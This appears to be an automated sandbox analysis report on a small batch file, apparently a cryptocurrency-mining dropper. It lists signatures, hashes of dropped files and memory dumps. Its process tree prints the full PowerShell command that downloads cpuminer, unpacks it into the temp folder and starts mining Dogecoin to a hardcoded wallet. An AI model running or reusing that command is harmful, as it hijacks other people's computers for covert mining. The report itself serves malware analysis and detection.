b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1796s
max time network
1803s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
04/02/2024, 15:51

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	4952	powershell.exe
4	4952	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3928	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3928	cpuminer-sse2.exe
3928	cpuminer-sse2.exe
3928	cpuminer-sse2.exe
3928	cpuminer-sse2.exe
3928	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4952	powershell.exe
4952	powershell.exe
4952	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4952	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 780 wrote to memory of 4952	780	cmd.exe	74
PID 780 wrote to memory of 4952	780	cmd.exe	74
PID 4952 wrote to memory of 200	4952	powershell.exe	75
PID 4952 wrote to memory of 200	4952	powershell.exe	75
PID 200 wrote to memory of 3928	200	cmd.exe	77
PID 200 wrote to memory of 3928	200	cmd.exe	77

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4952
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:200
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3928

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0egzkkes.t0y.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
542KB

MD5
d681aff04bb8e580c55c3fa5aa8fb29d

SHA1
91bdcff9135cf686aed784b8d696cab82fdac2dc

SHA256
5653b628d2a3286d177d12e7391f7e8bff9c2913accfe576621b5844911aa0a2

SHA512
da44c0be112ba6ceef1bdb1ef1e0266ed049114337e1d03c79ee65d145b3e6a81a226605f8d9ab1b618960e6d30d395c85b60dfef22f7cd6924d1ab524966e6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
865KB

MD5
dd69f2541479d483b72f522ccca92c4d

SHA1
9a596e6c90fa7bbd5816f7dd72e4a0d96ec69ef4

SHA256
ee1b05686b3b262c44b4e2a1676d460ad330a60433b4de78f9d96ed8862b5cb1

SHA512
bd6ed47eada53a1a7a22cf5ee60232a051c7282e60e2ae3cf2a7592b44f5a9b96b4fbce9fefaaa2a3902ee4928385d4841eb0f0ca39af6bd6c0861cec99f02a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
714KB

MD5
11dbcda5a4270a376634f5778930207e

SHA1
4ab140d87822173946a0ac093c52f5074cebcbb4

SHA256
32904ac33cd3671838a9fc8aebe8943e38099540a67bd63c85a5f1aeb848b5da

SHA512
ea83e0c8398e68a2c8e385b6bb6a93845c982bc4a7351451a7dc2261e41be25572da5f01cb829fd3edacf1445dcf98587a8e32c764367c4db1129dbaaf9a4af5

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
497KB

MD5
f62a1026304b3d059b197850eda690e5

SHA1
1013759b16ecd2e32ed1940f3fe4d8792bb781a8

SHA256
7be5a78d46e2dae5b94cef2dc20c06f8496f835ad27eb85a092bafb9fcd43936

SHA512
e014e8805f386084cbf99aa08337e5d4b419e2c8d31493f77f34fd8a1d5c60ff0e42421d3cc8dc85b183a6768751d4c35be2cdc28ebaa7a41b4e0b12ea2d0a56

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
464KB

MD5
ac0186919a888c28852f02df1a601aa6

SHA1
5f6b5a3ce1a8749687602d4d3d7965e1c05f992a

SHA256
cf4c9dbe83b1ddc48edef1c8cea0d0d1987aae95716ea5034e8019681eaf8b55

SHA512
52dcd31ec990034b30ee7323f1070f5b029577ddadf15de8a58e89b512212d4d4a59d57d9343653c7254e19fbc7c0f0168b8c17590688f23407eba19b53f0c0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
550KB

MD5
365a665feb5b25a7e562b3195970570d

SHA1
bcb21c6d1cfc51e9582fae451228a893aebfdbed

SHA256
d346173637a57eaf34da749471cfd91ab21a2f092b4ac46836ece2e7467fdc10

SHA512
a2b63bd19c347f4012867b9ad254eeb32bc412d5745a5ebc0fefc9c38e1e4d00a113a096d74272c05659f128cd28e285b3bc429d9c138e0dd5a57aa1b9ea4667

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
748KB

MD5
8e1a5dfa674a8dbb5ff58a0ce25df48e

SHA1
4b255b70f8c22fe185f5ce7b09c57460433df34d

SHA256
87174f351519beefbd5a3e186bd12ceda5a498c349114c65959a8e82988f8547

SHA512
232b9e71962e52505685cd6eb1b51f1e109e36f0d3476ec903c3d67cb678ebffcf91f5b03e14272b82cd08655a0694254fac70730e3d3605654919342e1ebb95

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
787KB

MD5
f1b6375a0f5c38caf9c4931608a8a55c

SHA1
4e336ff2cb17ee4fa5d376eda22cfe35db733d15

SHA256
d543e6aff7b736f50c6f5a725dd91bf4aa904f78b2db908669e07fe6672b0345

SHA512
e0ab166379da40438b6b0e31f5739a8d43e57090b0074b31a01350556479a6105f41447e144c2aabe0a2512743fa70fa021e9dbf0e6bc52499ec6eddc68fa5c3

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
399KB

MD5
2c65135cc80d6295a513c187b42cc2aa

SHA1
391f38cbfcabae0ae6ad84c793d76d658ad10104

SHA256
8b5d773fa8e09ea7375301f345c00e069f44816556951bfecbb846021adec2b5

SHA512
7ac1d51a14b67bf79a0bfb9e4a51949eb945dd17d3be774ad1621396c40233931151e1558029bc36892e4e83a3ea0dcf43b39ff56f52af0d447ee0896019d1f3

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
357KB

MD5
66b3cbb9d4740828a7a05454ea910a27

SHA1
9ae15856269f26cb78079caba6614f9c946ba37e

SHA256
e39a0fc35184bcec57ad96356d630dcfea0537bcbea02933f85d5594e18cabbd

SHA512
3388758da4e44cd2f75037ed4bc9319d4c08fd62c17245af13dff280ff887510bdc555f11a2862e0e0ed34d1dfaac7683743ce36a68d65e2ee22c5eb210389b4

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
525KB

MD5
e314437666fd7a055241ac89db1cad6d

SHA1
3550e784c630f1b9d3c61a6d3fe5efa6bbcf40b4

SHA256
254018e0d01fb5ddc6b72a6add936ca7b5d1c2db41d81945dc923fc5e3f85ca4

SHA512
cd2b40841a622cf7d9bc4808bc7988cd060ac1d68a7d1827e2d11f71359b58092d0aae7101b67d1e2ad8b80a4f40894d7772110a61542054411963b31d0efce3

Download Submit
memory/3928-131-0x00000000010F0000-0x00000000029A5000-memory.dmp

Filesize
24.7MB

Download
memory/3928-152-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3928-190-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/3928-188-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3928-187-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3928-175-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/3928-172-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3928-167-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3928-160-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/3928-157-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3928-145-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/3928-142-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3928-137-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3928-130-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/3928-129-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3928-128-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3928-127-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4952-35-0x0000017944670000-0x0000017944680000-memory.dmp

Filesize
64KB

Download
memory/4952-28-0x0000017944670000-0x0000017944680000-memory.dmp

Filesize
64KB

Download
memory/4952-7-0x0000017944670000-0x0000017944680000-memory.dmp

Filesize
64KB

Download
memory/4952-9-0x0000017944670000-0x0000017944680000-memory.dmp

Filesize
64KB

Download
memory/4952-5-0x00007FF96A640000-0x00007FF96B02C000-memory.dmp

Filesize
9.9MB

Download
memory/4952-8-0x00000179444F0000-0x0000017944512000-memory.dmp

Filesize
136KB

Download
memory/4952-10-0x0000017944890000-0x000001794499E000-memory.dmp

Filesize
1.1MB

Download
memory/4952-13-0x0000017944A20000-0x0000017944A96000-memory.dmp

Filesize
472KB

Download
memory/4952-4-0x0000017944590000-0x0000017944622000-memory.dmp

Filesize
584KB

Download
memory/4952-31-0x0000017944630000-0x0000017944646000-memory.dmp

Filesize
88KB

Download
memory/4952-6-0x000001792C330000-0x000001792C340000-memory.dmp

Filesize
64KB

Download
memory/4952-33-0x00007FF96A640000-0x00007FF96B02C000-memory.dmp

Filesize
9.9MB

Download
memory/4952-34-0x0000017944670000-0x0000017944680000-memory.dmp

Filesize
64KB

Download
memory/4952-114-0x00007FF96A640000-0x00007FF96B02C000-memory.dmp

Filesize
9.9MB

Download
memory/4952-70-0x0000017944570000-0x000001794457A000-memory.dmp

Filesize
40KB

Download
memory/4952-57-0x0000017944650000-0x0000017944662000-memory.dmp

Filesize
72KB

Download
memory/4952-36-0x0000017944670000-0x0000017944680000-memory.dmp

Filesize
64KB

Download